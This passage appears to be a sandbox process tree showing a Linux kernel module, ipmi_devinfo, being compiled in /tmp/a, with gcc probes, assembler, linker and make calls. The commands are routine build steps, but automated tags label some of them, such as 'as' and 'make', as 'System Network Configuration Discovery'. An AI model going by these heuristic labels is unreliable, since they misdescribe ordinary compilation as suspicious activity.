/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wpacked-not-aligned -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-packed-not-aligned\"; else echo \"\"; fi"3⤵PID:1927
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19274⤵PID:1928
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -Wpacked-not-aligned -c -x c /dev/null -o /tmp/a/.tmp_1927/tmp4⤵PID:1929
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1927/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cceqt4Z5.s5⤵PID:1930
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1927/tmp /tmp/cceqt4Z5.s5⤵PID:1931
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1927/tmp /tmp/cceqt4Z5.s5⤵PID:1931
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1927/tmp /tmp/cceqt4Z5.s5⤵PID:1931
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1927/tmp /tmp/cceqt4Z5.s5⤵PID:1931
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19274⤵PID:1932
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack --no-warn-rwx-segments -v) >/dev/null 2>&1; then echo \"--no-warn-rwx-segments\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1933 -
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19334⤵PID:1934
-
-
/usr/bin/ldld -m elf_x86_64 -z "max-page-size=0x200000" -z noexecstack --no-warn-rwx-segments -v4⤵PID:1935
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19334⤵PID:1936
-
-
-
/bin/sh/bin/sh -c "pkg-config libelf --libs 2>/dev/null || echo -lelf"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1937 -
/usr/bin/pkg-configpkg-config libelf --libs4⤵PID:1938
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( echo \"int main() {}\" | gcc -xc -o /dev/null -lelf -) >/dev/null 2>&1; then echo \"1\"; else echo \"0\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1939 -
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_19394⤵PID:1940
-
-
/usr/bin/gccgcc -xc -o /dev/null -lelf -4⤵PID:1943
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu - -quiet -dumpbase - "-mtune=generic" "-march=x86-64" -auxbase - -fasynchronous-unwind-tables -fstack-protector-strong -Wformat -Wformat-security -fstack-clash-protection -fcf-protection -o /tmp/ccPp03C9.s5⤵
- Writes file to tmp directory
PID:1944
-
-
/usr/local/sbin/asas --64 -o /tmp/ccVS77C5.o /tmp/ccPp03C9.s5⤵PID:1945
-
-
/usr/local/bin/asas --64 -o /tmp/ccVS77C5.o /tmp/ccPp03C9.s5⤵PID:1945
-
-
/usr/sbin/asas --64 -o /tmp/ccVS77C5.o /tmp/ccPp03C9.s5⤵PID:1945
-
-
/usr/bin/asas --64 -o /tmp/ccVS77C5.o /tmp/ccPp03C9.s5⤵
- Writes file to tmp directory
PID:1945
-
-
/usr/lib/gcc/x86_64-linux-gnu/9/collect2/usr/lib/gcc/x86_64-linux-gnu/9/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/9/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/9/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccxUyPy6.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /dev/null /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/9/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/9 -L/usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/9/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/9/../../.. -lelf /tmp/ccVS77C5.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/9/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/crtn.o5⤵
- Writes file to tmp directory
PID:1946 -
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/9/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/9/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccxUyPy6.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /dev/null /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/9/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/9 -L/usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/9/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/9/../../.. -lelf /tmp/ccVS77C5.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/9/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/9/../../../x86_64-linux-gnu/crtn.o6⤵PID:1947
-
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_19394⤵PID:1948
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1949 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1950
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1951 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1952
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1953 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1954
-
-
-
/bin/sh/bin/sh -c "test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \\ echo >&2; \\ echo >&2 \" ERROR: Kernel configuration is invalid.\"; \\ echo >&2 \" include/generated/autoconf.h or include/config/auto.conf are missing.\";\\ echo >&2 \" Run 'make oldconfig && make prepare' on kernel src to fix it.\"; \\ echo >&2 ; \\ /bin/false)"3⤵PID:1955
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1956 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1957
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1958 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1959
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1960 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1961
-
-
-
/usr/local/sbin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1962
-
-
/usr/local/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1962
-
-
/usr/sbin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1962
-
-
/usr/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1962 -
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/ipmi_devinfo.o'; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c; scripts/basic/fixdep /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.o 'gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\\''\"ipmi_devinfo\"'\\'' -DKBUILD_MODNAME='\\''\"ipmi_devinfo\"'\\'' -c -o /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c' > /tmp/a/.ipmi_devinfo.o.cmd; rm -f /tmp/a/.ipmi_devinfo.o.d"4⤵PID:1963
-
/usr/bin/gccgcc -Wall "-Wp,-MD,/tmp/a/.ipmi_devinfo.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -Wno-packed-not-aligned -DMODULE "-DKBUILD_BASENAME=\"ipmi_devinfo\"" "-DKBUILD_MODNAME=\"ipmi_devinfo\"" -c -o /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c5⤵PID:1964
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"ipmi_devinfo\"" -D "KBUILD_MODNAME=\"ipmi_devinfo\"" -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -include ./include/linux/kconfig.h -include ./include/linux/compiler_types.h -MD /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.c -quiet -dumpbase ipmi_devinfo.c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/ipmi_devinfo.o -O2 -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccrBoEUG.s6⤵PID:1965
-
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.o /tmp/ccrBoEUG.s6⤵
- System Network Configuration Discovery
PID:1966
-
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.o /tmp/ccrBoEUG.s6⤵
- System Network Configuration Discovery
PID:1966
-
-
/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.o /tmp/ccrBoEUG.s6⤵
- System Network Configuration Discovery
PID:1966
-
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.o /tmp/ccrBoEUG.s6⤵
- System Network Configuration Discovery
PID:1966
-
-
-
/usr/src/linux-headers-5.4.0-169-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.ipmi_devinfo.o.d /tmp/a/ipmi_devinfo.o "gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 